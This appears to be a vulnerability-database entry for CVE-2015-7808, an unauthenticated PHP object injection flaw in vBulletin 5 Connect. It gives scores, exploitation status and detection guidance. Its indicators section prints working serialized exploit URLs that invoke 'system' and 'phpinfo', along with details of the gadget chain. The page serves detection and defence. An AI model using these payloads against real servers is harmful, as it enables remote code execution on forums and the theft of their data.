cbcvebase.
CVE-2015-7808
published 2015-11-24

CVE-2015-7808: The vB_Api_Hook::decodeArguments method in vBulletin 5 Connect 5.1.2 through 5.1.9 allows remote attackers to conduct PHP object injection attacks and execute…

PriorityP279high7.5CVSS 2.0
AVNACLAuNCPIPAP
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
80.64%
99.6th percentile
The vB_Api_Hook::decodeArguments method in vBulletin 5 Connect 5.1.2 through 5.1.9 allows remote attackers to conduct PHP object injection attacks and execute arbitrary PHP code via a crafted serialized object in the arguments parameter to ajax/api/hook/decodeArguments.

Affected

16 ranges
VendorProductVersion rangeFixed in
vbulletinvbulletin
vbulletinvbulletin
vbulletinvbulletin
vbulletinvbulletin
vbulletinvbulletin
vbulletinvbulletin
vbulletinvbulletin
vbulletinvbulletin
vbulletinvbulletin
vbulletinvbulletin
vbulletinvbulletin
vbulletinvbulletin
vbulletinvbulletin
vbulletinvbulletin
vbulletinvbulletin
vbulletinvbulletin

Detection & IOCsextracted from sources · hover to see the quote

url/ajax/api/hook/decodeArguments
url/ajax/api/hook/decodeArguments?arguments=O:12:"vB_dB_Result":2:{s:5:"%00*%00db";O:11:"vB_Database":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"system";}}s:12:"%00*%00recordset";s:20:"echo%20$((0xfee10000))";}
urlhttp://localhost/vbforum/ajax/api/hook/decodeArguments?arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2a%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7Ds%3A12%3A%22%00%2a%00recordset%22%3Bi%3A1%3B%7D
bytes
O:12:"vB_dB_Result":2:{s:5:"%00*%00db";O:11:"vB_Database"
bytes
O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2A%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7Ds%3A12%3A%22%00%2A%00recordset%22%3Bi%3A1%3B%7D
  • Detect GET requests to the vBulletin endpoint /ajax/api/hook/decodeArguments with an 'arguments' parameter containing a PHP serialized object payload (starting with 'O:' or URL-encoded equivalent 'O%3A'). This is the sole attack vector for this CVE.
  • The serialized payload specifically uses the class chain vB_dB_Result containing a nested vB_Database object with a 'functions' array mapping 'free_result' to an OS command function (e.g., 'system', 'phpinfo'). Alert on these class names in the arguments parameter.
  • Canary/beacon detection: the exploit sends echo $((0xfee10000)) and checks for the response value 4276158464 to confirm code execution before issuing further commands.
  • Two distinct gadget chains are used depending on vBulletin version: vB_Database for 5.0.X and vB_Database_MySQLi for 5.1.X. Monitor for both class names in the arguments parameter.
  • The attack is unauthenticated (preauth). No session cookie or authentication token is required to exploit the endpoint.
  • ·Affected versions are strictly vBulletin 5 Connect 5.1.2 through 5.1.9 (and 5.0.X per Metasploit targeting). Versions outside this range are not confirmed vulnerable.
  • ·The exploit payload uses double-quote (0x22) as a bad character; URL-encoding of the serialized object is required for reliable delivery via the GET arguments parameter.

CVSS provenance

nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.